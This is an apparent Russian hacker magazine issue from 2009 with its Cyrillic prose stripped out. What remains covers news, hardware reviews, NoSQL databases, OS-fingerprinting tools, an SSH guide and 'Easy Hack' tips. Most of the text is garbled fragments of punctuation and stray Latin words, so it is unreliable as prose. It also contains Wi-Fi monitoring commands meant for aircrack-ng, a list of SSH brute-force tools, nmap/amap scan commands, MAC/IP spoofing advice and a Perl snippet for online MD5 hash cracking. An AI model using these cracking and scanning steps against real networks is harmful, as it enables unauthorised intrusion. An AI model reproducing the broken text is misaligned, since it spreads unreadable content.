56
x 08 () 2009
.
210
:
08 (128) 2009
. 46
START
SQL!
fingerprinting
128
. 26
SQL
. 20
PCI DSS
. 52
, . , ,
?
,
,
, / .
,
: ,
,
.
? ,
. ,
CD
96 , , ,
. , , .
, ,
, , .
P.S. , : vkontakte.ru/club10933209, .
.
. , ..
5-6
.
nikitozz, . .
nikitoz@glc.ru
udalite.livejournal.com
vkontakte.ru/club10933209
CONTENT
08(128)
004 MEGANEWS
FERRUM
018
PC_ZONE
030
SQL
SSH'
040
060
064
076
082
110
PCI DSS
SYN/ACK
116
121
twitter-
X-TOOLS
070
106
066
socks-
Pythone
EASY-HACK
056
102
052
098
, SQL!
036
046
092
GUI PYTHON!
026
088
014
020
126
130
132
SCCM:
IT-
IN DA FOCUS
136
140
MegaFAQ Linux
143
Linux VServer
Linux - 2009
PAM'
144
PSYCHO:
FAQ UNITED
FAQ
8.5
WWW2
web-
,
! .
, .
,
: ,
,
.
, :
,
, , ,
.
.
, security level
!
/
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN\ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)
Dr. Klouniz
(alexander@real.xakep.ru)
Dlinyj
(dlinyj@real.xakep.ru)
>
(lyashchenko@gameland.ru)
/ART
>-
(novikov.e@gameland.ru)
>
(svetlyh@gameland.ru)
/DVD
>
Step
(step@real.xakep.ru)
> Unix-
Ant
>
/PUBLISHING
>
119021, , . ,
. 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>
>
>
>
>
>
>PR-
>
>
>
START
046
070
Fedora 11
Leonidas
102
>
>
(strekneva@gameland.ru)
>
> -
>
(andrey@gameland.ru)
>
(devald@gameland.ru)
>
(kosheleva@gameland.ru )
>
(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999
>
101000, ,
, / 652,
,
77-11802 14
2002 .
Lietuvas Rivas, .
100 000 .
.
.
:
. ,
,
.
.
.
.
:
content@gameland.ru
, , 2009
.
_ssh3r1ff(ssh3r1ff@gmail.com). .
>> meganews
J3
PC27
PC27
J3
- ,
Apple .
2004 , ,
- ,
, . ,
!
Apple
, ,
. , ,
, excellent,
, ,
.
14%
21 .
, 300 ?
, , ,
,
MMOG. ,
, ,
. ,
, , , ( ). , .
,
.
. ,
MMORPG. , ,
:).
GOOGLE WAVE
100.000 30- (
).
004
X 08 /128/ 09
PC27
- ,
. ,
- , , ,
, . eMachines
( Acer) eMachines EZ1601-01
,
:
$400. ,
,
... . Intel Atom N270 (1.6 ),
Intel GMA 950, 1
(DDR2-533 ), 160
(SATA), ,
8x DVDR/RW DL SuperMulti.
. ,
, , , 18.5.
. C :
,
.
.
PC27
POSITIVE TECHNOLOGIES
,
74%
PCI DSS.
TPB
, The
Pirate Bay , ,
. ,
,
, ,
http://thevideobay.org.
YouTube, , ,
. ,
Flash, HTML 5
<video> <audio>. ,
(, IE
).
, VideoBay : Firefox
3.5, Opera 9.52 preview, Google Chrome 3,
Safari 3.4 Safari 4.
.
Usenet
, ( ) Pirate Bay .
, .
, , , Usenet. -, ,
( 80-
) . , , Usenet
, , ,
. RIAA
, - ,
2007 Usenet.com Inc.
- -.
, .
, ,
\ Usenet.com.
PC27
J3
GMail
SMS.
,
Google ,
SMS
.
: GMail
,
,
.
,
, ,
help, Google
-
(
).
help ,
. -
!.
,
( ,
,
, IP),
,
.
IDC , 2008
67%.
Sony
, . Sony
10- VAIO
W.
Sony :
, .
.
: Intel Atom
N280 1.66 , 1 , 160
, - 3.1 , Bluetooth, Wi-Fi 802.11
b/g/n, LAN USB-. 10.1 ( 16:9), 1366768
. 3 .
$499.
.
MESSAGELABS,
90.4%.
5- , Production Godskitchen
Camel Urban Wave, Camel Zeppelin Production. ,
, ,
. -
: , , .
Google Chrome OS
Nero, Google.
,
,
,
.
, :
,
Chrome OS
2010 . Linux,
x86 ARM . Chrome OS
, , open source
! ,
- , . Android Chrome OS
, ,
.
, Google .
.
, ,
. -
, . fail SGAE,
. , SGAE eD2K-
elrincondejesus.com.
, - . P2P-, , ,
,
. . ,
,
. , . ,
, .
Trend Micro , Symbian OS.
, Symbian Foundation,
. . ,
, Sexy Space,
ACSServer.exe, , ,
.
, ,
. ,
SMS-
.
? ?
Google GMail ,
Labs .
eBay PayPal,
.
DKIM,
, , ,
.
.
(
, , ,
).
15- MICROSOFT
MICROSOFT OFFICE 2000,
10 .
Microsoft coming
soon
Apple, , Microsoft
, .
,
,
- Microsoft Worldwide Partner Conference.
Microsoft ,
Windows 7. ,
Apple,
, , . Microsoft
,
, .
Project Natal
Windows
, Microsoft E3. Project Natal
X-Box 360,
. Natal
,
( )
, , .
,
,
. Microsoft , Natal Windows . ,
,
(, , ,
, ), .
.
!
,
,
,
, , ,
. ? , ,
.
Nokia,
INTERPRET ,
36% .
11
30 Windows 7, ,
, . ? , !
, .
>> ferrum
:
, . ,
(, ) , . - , -
,
, , Intel X58.
,
58, LGA1366. ,
Intel Nehalem
DDR3 (),
. QPI
25.6 /.
ICH10R
6 PCIe x1 12 USB.
nVidia SLI,
Intel.
,
, nVidia .
, , SLI . ,
,
,
. 36 PCI-E 2.0,
, 3-way
SLI PCI-E 8x. ,
, ,
16 ,
,
nVidia nForce 200, 16 PCI-E.
,
, .
,
. , 6
Kingston, JEDEC (
1.5, 1333 , 9-9-9-24).
:
Lavalys Everest 5 ( )
Passmark Performance Test 6.1.
Microsoft Windows XP SP3,
BIOS
.
,
,
LAVALYS EVEREST
MSI Eclipse SLI
Intel DX58SO
Gigabyte EX58-Extreme
ECS X58B-A
Everest memory
benchmarkCopy(M/)
Everest memory
benchmarkWrite(M/)
Everest memory
benchmarkRead(M/)
ASRock X58
Deluxe
7520 .
:
: Intel X58 Express, Intel ICH10R
: DDR3 800/1066/1333/1600/1866/2000
non-ECC
BIOS: AMI BIOS
: PCI (3 .), PCI-E x16 (4.)
: 24- 8- , 5
( ),
IEEE1394a, USB 2.0 (3 .), IR, -
, CD-in, COM, HDMI-S/PDIF
: SATA 2.0 (6 .), IDE, Floppy
RAID: 0/1/5/10, Intel Matrix Storage
: PS/2, S/PDIF ( ), RJ-45, IEEE1394a, USB 2.0 (6 .), eSATA, MiniJack 3.5 mm (6 .)
: Realtek ALC890
: Realtek RTL8111DL
. BIOS ,
.
ASUS P6T6 WS
12500 .
Revolution
:
: Intel X58 Express + NVIDIA nForce 200,
Intel ICH10R
: DDR3 800/1066/1333/1600/1866/2000
non-ECC
BIOS: AMI BIOS
: PCI-E x16 (3 .), PCI-E x8 (2 .), PCI-E x4 (1 .)
: 24- 8- , 5
( ),
IEEE1394a, USB 2.0 (3 .), IR, -
, CD-in
: SATA 2.0 (6 .), SAS (2 .)
RAID: 0/1/5/10
: PS/2, S/PDIF( ), RJ-45, IEEE1394a, USB 2.0 (6 .), eSATA (2 .), MiniJack 3.5 mm (6
.)
: Realtek ALC890
: Realtek RTL8111DL
Revolution
! , LPT COM,
PCI IDE.
PS/2. : PCI-E 2.0, eSATA,
SATA II SATA\SAS.
,
molex.
PCI-Express 2.0 16
nVidia nForce 200.
8, 4.
, , ,
,
.
10600 .
8100 .
ECS Black
X58B-A
:
: Intel X58 Express, Intel ICH10R
: DDR3 800/1066/1333/1600 non-ECC
BIOS: AMI BIOS
: PCI (1 .), PCI-E x16 (2 .), PCI-E x4 (1 .),
PCI-E x1 (2 .)
: 24- 8- , 5
( ),
IEEE1394a, USB 2.0 (3 .), IR, -
, CD-in, IEEE1394a, S/PDIF,
: SATA 2.0 (6 .), eSATA 2 .
RAID: 0/1/0+1/5
: PS/2, RJ-45, IEEE1394a, USB 2.0 (6 .),
eSATA (2 .), MiniJack 3.5 mm (6 .)
: Realtek ALC888S-VC
: Realtek RTL8111C
Gigabyte
GA-EX58-Extreme
:
: Intel X58 Express, Intel ICH10R
: DDR3 800/1066/1333/2100+ nonECC
BIOS: Award BIOS
: PCI (2 .), PCI-E x16 (2 .), PCI-E x1 (1 .),
PCI-E x4 (1 .), PCI-E x8 (1 .)
: 24- 8- , 4
( ),
IEEE1394a (2 .), USB 2.0 (2 .), - , CD-in
: SATA 2.0 (10 .), IDE, Floppy
RAID: 0/1/5/10
: PS/2, S/PDIF( ), RJ-45 (2 .), IEEE1394a, USB 2.0 (8 .), MiniJack 3.5 mm (6 .)
: Realtek ALC889
: Realtek RTL8111D
. , , , .
, , -, POST-, Power
Reset, , BIOS,
, , .
.
eSATA,
USB FireWire.
PCI-Express 2.0 x16, PCI 2.0, PCI-Express
x4 PCI Express x1.
,
(
), . , , Gigabyte,
Ultra Durable 3.
, ,
. , Power
Reset, POST-, , ,
, BIOS.
, 10 SATA 2.0 .
,
Intel VRD 11.1
,
PCI-Express.
8050 .
10600 .
Intel
DX58SO
:
:
: Intel X58 Express, Intel ICH10R
: DDR3 800/1066/1333/1600 non-ECC
BIOS: AMI BIOS
: PCI (1 .), PCI-E x16 (2 .), PCI-E x4 (1 .)
: 24- 8- ,
5 ( 2 ),
IEEE1394a, USB 2.0 (2 .), IR, -
: SATA 2.0 (6 .)
RAID: 0/1/5/10
: S/PDIF (), RJ-45,
IEEE1394a, USB 2.0 (8 .), eSATA (2 .), MiniJack 3.5 mm (6 .)
: Realtek ALC889
: Realtek RTL8111D
Intel, ,
,
. , ,
(4 ). ,
. PS/2 ,
eSATA. IDE
, SATA-. ,
PCI-Express x1, PCI-Express x16 4.
,
. ,
BIOS, (Power Slope),
.
BIOS .
, ,
, , .
, ,
.
,
, , -
.
Gigabyte
GA-EX58-Extreme,
M Eclipse
MSI
S
SLI
:
: Intel X58 Express, Intel ICH10R
: DDR3 800/1066/1333/1600 non-ECC
BIOS: AMI BIOS
: PCI (2 .), PCI-E x16 (3.), PCI-E x1
: 24- 8- , 6
( ),
IEEE1394a, USB 2.0 (2 .)
: SATA 2.0 (10 .), IDE
RAID: 0/1/5/10/JBOD, Intel Matrix Storage
: PS/2, RJ-45(Ethernet) 2 .,
IEEE1394a, USB 2.0 (8 .), eSATA 2 .
:
Creative Sound Blaster X-Fi Xtreme Audio
: Realtek 8111C (10/100/1000 /) 2 .
. ,
,
Creative Sound Blaster X-Fi Xtreme Audio,
. , GreenPower Genie,
BIOS MSI.
10 SATA, 2 eSATA\USB
.
POST-, , , .
.
,
(
, Intel
Core i7).
OCZ. , , , MSI, ,
.
.
Intel
DX58,
. ,
ASUS P6T6 WS Revolution
MSI Eclipse SLI. , ,
. ASUS
SAS nVidia nForce 200
. MSI
,
SATA. .z
ASUS
Eee PC 1008HA
,
X-Toolz. ,
, . ASUS Eee PC 1008HA.
, , , : , !.
: 18 25,7 . ,
.
Eee PC 1008HA
. ,
, .
, 1.1 ,
, 10" 6
.
, ASUS .
Eee PC, ,
Python, .
. 1008HA
,
. ,
: ,
Shift . ,
,
14" .
(
1024 x 600) , ,
.
Visual Studio Eclipse.
. , , Eee PC ,
, SVN-,
.
. ,
:).
1008HA . Eee PC Intel Atom.
Atom N280 1,66 , 1
160 . Windows XP Home , - , Windows 7
. Release-candidate , Microsoft , -
. , ,
, .
VOIP
, . 13,
1008HA,
. , ,
.
VoIP- ,
.
, z SIP Skype.
1.3 , ,
. ,
-, ,
.
Bluetooth-. Bluetooth 2.1 EDR
.
?
. ,
,
. 1008HA ,
6
. - 2,900
(, ,
) ,
. , , ,
.
65%,
Komodo Edit
15% . ,
4,5-5 .
,
, . .
?
Intel Atom N280,
. 1,66
667 Intel GN40.
N270,
.
,
.
, , - .
, Eee PC 1008HA
Intel. , Kismet Aircrack
.
Monitoring Mode, .
Wi-Fi Intel . 1008HA, , .
Linux
Backtrack4, ( ). ,
,
:
modprobe ath9k
airmon-ng start wlan0
airodump-ng wlan0
Wi-Fi,
airodump, . ,
, .
, ,
aircrack-ng.
!
, Eee PC ASUS
. ,
.
,
, . .
? !
ASUS
trendclub.ru. z
>> pc_zone
DATA
KEY
Fox
Hash
function
DFCD3454
Hash
function
52ED879E
Hash
function
46042841
DISTRIBUTED
NETWORK
PEERS
/ ALEKS.RAIDEN@GMAIL.COM /
, SQL!
SQL
? SQL, ? ,
. , , SQL . . !
, ,
, ? Google, Amazon,
eBay, Twitter, Facebook
? -,
PHP+mySQL. .
, , ,
.
, ,
. ,
,
, ,
. ,
(
#125
z ). ,
- ,
.
.
- . -.
: ,
, , ,
.
master-slave, BDSM !
, ,
,
. ,
, .
, ( ,
)?
: ,
? ,
,
,
.
(
master-master multi-master ),
,
.
,
.
,
. , ,
. ,
.
. .
SQL-!
,
,
. ?
!
? ( ,
)
,
SQL (,
-. ,
, / ( );
.
- - (DHT).
, ,
, ( ,
torrent).
,
, .
MEMCACHEDB
) .
, ?
,
.
, ,
(
) .
,
? !
, SQL,
,
.
, - , .
.
.
,
.
-, ?
key-value database!
,
. , ,
:
( ) ,
. ,
.
,
.
get ( ),
set ( ), delete ( ), update (
).
,
,
( ,
)
.
, ( SQL
).
.., , , ,
,
.
key-value .
,
, , ,
,
(BLOB-),
. DHT ,
, .
.
, ! ,
, (
,
).
.
, , .
. ,
!
, , ,
. ! , ,
SQL-,
,
, .
- , .
HTTP://WWW
links
:
http://en.wikipedia.org/wiki/Multimaster_replication.
Google:
http://highscalability.com/googlearchitecture.
Google
:
http://labs.google.com/papers/bigtable.html.
DHT:
http://ru.wikipedia.org/wiki/DHT.
Memcached:
http://danga.com/memcached.
Facebook:
http://github.com/fbmarc/facebookmemcached/tree/master.
PHP
Redis-
:
http://code.google.com/p/redis-ajaxchat.
(
SQL-
-). , .
, SQL,
, .
, SQL key-value , .
,
, , .
. MemcacheDB,
memcache BerkeleyDB,
. ,
Redis
.
,
,
.
, !
! ,
.
Memcached/MemcacheDB (memcachedb.org) ,
key-value DB.
, ,
, .
, ,
, ,
.
UDP- ,
, , 1.4,
. Facebook , ,
! ,
Memcached- ! ,
. , , MemcacheDB,
. ,
( ),
.
Project Voldemort (project-voldemort.com)
, , .
Java .
.
, Project Voldemort JavaAPI , ,
Google ProtoBuf Thrift,
. ,
( ),
.
,
, , .
: 10-20
VOLDEMORT
PROJECT
, , LinkedIn ,
.
Apache CouchDB (couchdb.apache.org)
! , CouchDB ,
-.
, , -.
, (), , ,
. , ,
. Apache
CouchDB Erlang ( , ) HTTP
REST- JSON API,
JavaScripta- -!
, ,
? , JavaScript SQL.
,
. , .
Redis (code.google.com/p/redis)
,
! ?
. 100
. ,
Redis , , .
, ,
( -),
( !) .
, memcached ,
- , Redis-
! ,
key-value ( SQL,
). ANSI C
(
BSD),
. TCP
telnet. , API
. ,
- PHP, ! :)
TWITTER?!
, , ,
,
VOLDEMORT
(, ,
).
. , (Twitter)
.
,
.
(
).
Redis.
,
HTML- ,
,
.
0. , .
( ,
), ,
() , ( ,
).
1.
-,
,
(
, , ),
, , ,
.
JSON
,
JSON . SET
admin {name:supervasya,age:21,sex:m,registered:27.07.2009} admin.
COUCHDB
, GET admin, JSON- .
: SET admin_pass
md5(password) , _pass, md5 .
( ,
). , : EXISTS admin,
(, ),
: GET admin_pass. . ( SELECT COUNT() ): INCR
count_user 1.
,
, , (set): SADD
all_user_list admin. , all_user_list
, .
2. . ,
, -
( !). , , , admin_11232142135,
: SET
admin_11232142135 {author:admin,text: ! ,time:
11232142135,title:!}. ,
,
. : RPUSH admin_msgs 11232142135.
admin_msgs . ?
,
, .
,
.
3. () , .
, : RPUSH admin_follow vasja. admin_follow
, admin.
, , :
RPUSH vasja _follow admin.
4. .
, . , , , .
, .
, .
. , .
( ): LLEN admin_follow. ,
2 ( ):
LRANGE admin_follow 0 1 .
, ,
.
.
, ,
. , N
LRANGE,
( + _msgs). ,
, Redis- ,
. ,
KEYS,
. ,
( , ).
(
,
).
,
, .
, JSON-
, 3600 (
). , 100,
.
+ , (,
),
login_time ( , Redis-e), .
, , ,
array_merge , array_sort.
,
SQL-.
,
.
Redis-
, .
,
memcached (
) MGET _,
: MS SQL ,
, SQL Shield
COUCHDB
SysComments Decryptor ,
, .
,
JSON- .
-, JSON
AJAX-. JSON
,
.
admin_follow,
, , MGET, ,
.
.
admin_follow ,
LREM, ,
.
?
(SQL ) ,
,
.
,
,
. !
,
, SQL-,
- . , ,
, !
, Redis MemcachedDB, ,
- , , (
, -, )
key-value ! ,
, ! SQL-
.z
STEP
/ STEP@GLC.RU /
z . ,
, , . . ,
. , , fingerprinting.
. ,
. , ,
.
, ,
(, ,
),
, ,
, ,
.
fingerprinting,
.
fingerprinting
: FIN-, ICMP ,
ICMP TCP-.
TCP/IP
. .
, .
, TTL (
), DF ( ), TOS
(Type-Of-Service) ..
fingerprinting-
. , DF
( OpenBSD),
, DF ( ).
TTL: FreeBSD
Linux 64. ,
OS
, .
,
.
fingerprinting .
,
fingerprinting.
Nmap
http://nmap.org
: Unix, MacOS,
Win32
, fingerprinting
Nmap.
, -
,
, . , c
. , Nmap ,
OS Fingerprinting (
-O). ,
Nmap
. microsoft.com :).
nmap -O -PN microsoft.com
Starting Nmap 4.76 ...
Running (JUST GUESSING) : OpenBSD 4.X (86%)
Aggressive OS guesses: OpenBSD 4.3 (86%)
Nmap:
nmap -O -PN microsoft.com
Starting Nmap 5.00 ...
Running (JUST GUESSING) : Microsoft Windows 2003 (91%)
Aggressive OS guesses: Microsoft Windows Server 2003 SP2 (91%)
,
NMAP
-
.
, zenmap
.
,
, , advanced
. ,
.
Intense
scan , . -,
Nmap
, embedded. MAC Asustek. 80
HTTP-,
,
WL500gP!
:). 5.00
,
,
.
MSRPC/
NetBIOS ,
,
.
Ncat, ,
.
,
,
Ndiff. , . -
,
,
.
p0f v2
lcamtuf.coredump.cx
: Unix, MacOS,
Win32
Nmap,
fingerprinting, p0f
. .. - ,
. , - IDS ( ).
p0f
, :
,
( SYN );
, (
SYN+ACK);
, ( RST+), - ,
;
P0F
,
( -
).
,
NAT, ,
. p0f
, ,
Nmap
. , ,
- .
lookup, , ARIN-
!
p0f ,
(
),
.
,
.
lcamtuf.coredump.cx/p0f-help , ,
.
THC-Amap
thc.org/thc-amap
: Unix, MacOS,
Win32
, , .
( Nmap), ,
, .
,
: ,
FTP 21, SSH 22 .. ,
, .
,
.
, ..
FTP-, 31337 ,
. !
Amap
TH. ,
. , ,
. ,
, .
SSH-, 988
, -, 29-.
Amap , .
Nmap.
: Nmap, ,
,
THC-Amap, .
:
#nmap -sS -oM results.nmap -p 1-65535 IP-
#amap -i results.nmap -o results.amap -m
,
, - .
httprint
www.net-square.com
/httprint
: Linux, MacOS,
FreeBSD, Win32
,
. ,
HTTP , , -
NetworkMiner
http://sourceforge.net/projects
/networkminer
: Windows
HTTP://WWW
links
fingerprint, p0f:
project.honeynet.org/papers/finger.
ICMP fingerprint:
www.sys-security.com/html/papers.html.
DVD
dvd
fingerprint
DVD-.
NETWORKMINER
.
httprint.
. , , .
, , , (, mod_security.c)
ServerMask (www.port80software.com),
. Httprint .
Httprint ,
-. Apache, ISS -.
, , ADSL, .
SSL-, .
,
.
Nmap.
. , multi-threading
, .
, :
2005 .
,
Vista.
fingerprintinga?
fingerprinting .
, ,
.
, TCP/IP- . /proc/sys/net 64 . Windows RST (rst.void.ru) r57BF (broken fingers),
TCP/IP.
BSD-,
Sony Playstation 2 :).
. NetworkMiner
, PCAP.
,
.
,
, .
, NetworkMiner ,
,
.
,
( WLAN-
),
NetworkMiner ,
,
, .
TCP SYN SYN+ACK p0f Ettercap.
fingerprinting
DHCP-, Satori.
,
MAC-: Nmap.
ike-scan
www.nta-monitor.com/tools/ikescan
: Unix, MacOS, Win32
, ,
IKE-SCAN
VPN-.
IKE- . ,
VPN, ,
, ,
.
VPN- ike-scan . :
fingerprinting?. . VPN-,
.
fingerprinting, ike-scan,
XPROBE2, UBUNTU
SATORI
SINFP
, ,
.
Xprobe2
xprobe.sourceforge.net
: Unix
. Xprobe2
fingerprinting,
Nmap , , .
honeypot TCP/IP.
. , . , pf,
OpenBSD ,
TTL, . TCP- ( -T) xprobe
.
UDP-, -U.
, Xprobe2
fingerprinting ICMP-.
, fuzzing , TCP/IP, . ,
, , Xprobe -
, ,
.
Satori
http://myweb.cableone.net/xnih
: Windows, Linux
Satori ,
OC fingerprinting, , , .
,
WinPCap,
, .
Satori Windows,
HP ( HP Switch Protocol), Cisco (
CDP-). ,
Satori, , DHCP. ,
,
. . Satori,
SAM, ARP- .
SinFP
www.gomor.org/bin/view/Sinfp/WebHome
: Unix, Windows
SinFP ,
,
.
. , Nmap
TCP/IP-, SinFP
. Perl,
,
. CPAN: search.
cpan.org/~gomor/Net-SinFP. , SinFP
, . z
STEP
/ STEP@GAMELAND.RU /
SSH
FULL-GUIDE SECURE SHELL
! . SSH Telnet,
, , .
Secure Shell .
1:
SSH-
SSH,
.
PuTTY (www.chiark.greenend.org.uk)
SecureCRT (www.vandyke.com), .
, PuTTY .
. , ,
, UNIX.
, Visualhack++.
: Raw, Telnet, Rlogin, FTP (SFTP), SSH1,
SSH2. , PuTTY ,
(putty.exe) :
puttygen rsa/dsa ,
;
pagent ,
,
;
plink
putty;
pscp , ;
psftp ftp- , ,
..
.
PuTTY,
SecureCRT.
? , ,
. -
, PuTTY , ,
.
,
,
PuTTY Connection Manager (puttycm.free.
fr). , -
PuTTY,
,
. , SSH-
-
(putty.exe), PuTTY Connection Manager
, .
#
PuTTY.
:
;
. ,
,
;
;
,
;
AES; , DLL-.
2:
/. ,
,
( ,
). PuTTY . PuTTY
SSH-,
,
. , ,
,
. .
Sessions.
IP- , , .
,
. Connection
Data Auto-login username
(, UserAcc).
Sessions.
Saved Sessions ( ) , , session1, Save.
,
PuTTY, Saved Sessions, Load
Open. ,
. SSH
,
.
(/)
SSH- .
PuTTYgen,
. , ,
.
. OpenSSH
/.ssh/authorized_keys2 :
mkdir ~/.ssh
chmod 700 ~/.ssh
vi ~/.ssh/authorized_keys2
ssh-dss AAAAB3NzaC1kc3MAAAE [. . .] Huw2FekFNM7pMgEQi57k= dsakey-20061205
chmod 600 ~/.ssh/authorized_keys2
/
,
.
,
(SSH Auth Private key file
for authentication). ,
.
.
Pageant,
PuTTY.
,
sshproxy (sshproxy-project.org/
about), Python.
.
, ,
DMZ-.
SSH-,
sshproxy
.
,
, ,
.
3:
, SSH . .
, SSH-,
.
INFO
info
SSH:
SSH Brute Forcer (www.securiteam.com/tools/5QP0L2K60E.html)
SSHatter (freshmeat.net/projects/sshatter)
SSH BruteForcer (www.darkc0de.com/bruteforce)
THC Hydra (www.thc.org/thc-hydra)
DVD
dvd
DVD.
SSH-
MOBASSH
FREESSHD
, .
.
PuTTY.
PuTTY :
Session Host Name (_ssh_), Port (22),
Protocol (SSH);
Connection/SSH/Tunnels, Add
new forwarded port, Source port (_
, , 666), Destination (___
:3306);
Local .
, 127.0.0.1 ,
Source Port (, 666).
unix- :
ssh -L666:___: -n
@_ssh_
MySQL, VNC-
..
4:
2-HOP TUNNEL
Symbian:
PuTTY for Symbian OS (s2putty.sourceforge.net)
Windows Mobile:
PocketPuTTY (www.pocketputty.net)
Java:
MidpSSH (www.xk72.com/midpssh)
iPhone:
iSSH (www.zinger-soft.com)
myhome.example.org,
gateway.example.com, SSH-
server.example.com.
- .
myhome.example.org :
ssh -f -N -L 51526:server.example.com:22 -2 gateway.example.com
! , SSH- 51526
myhome.example.org
(server.example.com). ,
server.example.com:22,
51526, SSH.
WINSCP
:
REMOTE
DESKTOP SSH
,
,
49152-65535.
5:
SSH-
.
- OpenSSH,
. ( , , ..)
DropBear (matt.ucc.asn.au/
dropbear/dropbear.html). , ,
SSH- ,
. OpenSSH
DropBear ,
. , WinSSHD (www.bitvise.com/
winsshd). WinSSHD
MobaSSH (mobassh.mobatek.net)
. , SSH- ,
Install.
.
MobaSSH
,
, OpenSSH,
Cygwin.
(ls dir
..). .
/cygdrive.
,
UNC-:
//<LAN_WORKSTATION>, /registry.
MobaHwInfo:
MobaSwInfo:
MobaTaskList, MobaKillTask:
TCPCapture:
scp, sftp:
ssh-
rsync, wget:
MobaSSH 100% .
,
freeSSHd (www.
freesshd.com). ; ,
, ,
.
cmd.exe. , ,
, ,
,
, , , SFT ..
6:
Plink, PuTTY.
,
, . :
plink my-ssh-session
. ,
.
, -
. -
,
MyEnTunnel (nemesis2.qx.net/pages/
MyEnTunnel).
SSH-. : Plink.
( ,
-
), MyEnTunnel
Plink.
. ,
:
Slow Polling MyEnTunnel . ,
,
Wine .
7:
SSH,
(Secure file
transfer), SFTP (SSH File Transfer Protocol)
SCP (Secure CoPy).
SSH,
:
, ,
,
.
WinSCP (www.winscp.
net). , .
,
, , . , WinSCP
Pageant
.
, - ?
, , ,
SSH. ExpanDrive (www.expandrive.com),
SFtpDrive,
, , , .
,
- :).
8:
: ,
, , .
.
Telnet/SSH
Tera Term (http://www.ayera.com/teraterm). ,
-, Web
Accept HTTP Connections.
,
, . SSH-,
, .
, WebShell
(www-personal.umich.edu/~mressl/webshell).
Python,
. Ajax,
, (,
).
9: RDP SSH
SSH- VNC RDP
. RDP-
WiSSH (www.wissh.com). WiSSH Gateway SSH-
: Windows 2000 Terminal Servers; Windows 2003 Terminal Servers;
Windows NT Terminal Server Edition; Windows XP Windows 2000/2003
Remote Desktop.
, .
10:
. PuTTY Connection Manager
,
. , . ClusterSSH
(clusterssh.sourceforge.net)
. SSH-
, .
, , , .. SSH-.
. ,
. ClusterSSH xterm
, Perl/TK.
11:
.
MYENTUNNEL , SSH-
, SSH1. OpenSSH :
vi /etc/ssh/sshd_config
[...]
Protocol 2
PasswordAuthentication no
UsePAM no
[...]
, . , Sshguard
(sshguard.sourceforge.net).
(syslog, syslog-ng, metalog, multilog, raw)
. IP- (pf, ipfw, netfilter/iptables hosts.allow). sshd, dovecot, proftpd, pure-ftpd,
FreeBSD ftpd, UWimap (imap, pop). Fail2ban
(www.fail2ban.org) Sshdfilter (http://www.csc.liv.ac.uk/~greg/sshdfilter).
>>
Easy Hack
R0ID
/ R0ID@MAIL.RU /
SKVOZ
:
( , ) , . ,
. , KardaTools,
, .
, , ,
.
Windows,
. ,
. , ,
.
1. HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\FONTSUBSTITUTES\,
:
"MS Shell Dlg" = "MS Sans Serif,204"
"MS Shell Dlg 2" = "MS Sans Serif,204"
2. HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\FONTMAPPER\ :
"ARIAL" = dword:000000cc
"DEFAULT" = dword:000000cc
3. HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\NLS\CODEPAGE\ :
"1251" = "c_1251.nls"
"1252" = "c_1251.nls"
"866" = "c_866.nls"
"ACP" = "1251"
"OEMCP" = "866"
:
FLASH
:
Flash
. ,
,
USB-. : ? -,
Flash, Calculate
Linux Desktop (www.calculate-linux.ru). Gentoo Linux
"MACCP" = "10007"
"OEMHAL" = "vga866.fon"
, , . WinXP .
1. .reg :
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\CodePage]
"1252"="c_1251.nls"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes]
"Arial,0"="Arial,204"
"Comic Sans MS,0"="Comic Sans MS,204"
"Courier,0"="Courier New,204"
"Microsoft Sans Serif,0"="Microsoft Sans Serif,204"
"Tahoma,0"="Tahoma,204"
"Times New Roman,0"="Times New Roman,204"
"Verdana,0"="Verdana,204"
2.
.
3. .
, LiveCD,
USB-Flash . :
Calculate Directory Server ( Calculate Linux)
Gentoo Linux
LiveCD
: , , ,
, , , ,
:
1. CD/DVD-, Calculate
Linux Desktop ( www.calculate-linux.ru).
2. / fdisk:
fdisk <drive>
<drive> .
3. , ext4,
ext3, ext2, reiserfs, xfs jfs.
4. :
:
/, -
, Linux-OS.
,
.
:
, , , .
. ,
- ,
.
, , . DriveCrypt, . , :
1. .
2. .
3. ,
.
, .
4. , .
5. Drivers, (, C:\) . .
6. , . :
DOS ( )
Vesta ( )
7. , ,
.
, , ,
.
,
. , , :).
:).
-,
n- .
Find proxies for Me. . :
,
IP
( IP:
aaa,bbb,ccc,ddd<=255, : eeeee<=65536)
2. .
3. ,
( Text).
4. ( IP/ ) , .
:
1. , , -.
:
213.185.116.218
3128
:
,
ACL-.
?
MACA ,
:
, MAC
,
. , , MAC,
IP! ,
. Sterm, Cain&Abel.
:
1. , Configure.
2. (
).
3. IP Spoofed Source Address.
:
# .htaccess-
Options +FollowSymLinks
RewriteEngine on
#
# IP
RewriteCond %{REMOTE_ADDR} !^1\.2\.3\.4$
# IP
RewriteCond %{REMOTE_ADDR} !^5\.6\.7\.8$
RewriteRule .* http://www.google.com/ [R=302,L]
IP, (,
- ), Google. :
# allow/deny .htaccess-
<limit GET>
satisfy any
order deny,allow
deny from all
allow from 63.76.22.2
allow from 130.116.16.
allow from 130.116.17.
</limit>
: MD5,
:
,
,
. , Winpcap LibInject.
! . ,
. , Hashcracking.info. , ,
, ,
.
HashSearcher. mailbrush. 15 MD5-. :
hashcracking.info, md5.rednoize.com, tmto.org, md5pass.info, milw0rm.
com. , ! ,
.
Perl:
$url = "http://md5.hashcracking.com/search.php?md5=$hash";
$lwp = LWP::UserAgent->new();
$lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");
$connect = $lwp->get($url);
print md5.hashcracking.com
---- ;
: RAINBOW TABLE,
GPU
:
, ,
, , , winrtgen,
. GPU
, Zhu Shuanglei.
(rtgen CUDA)
project-rainbowcrack.com. XSerg. :
# ,
, ,
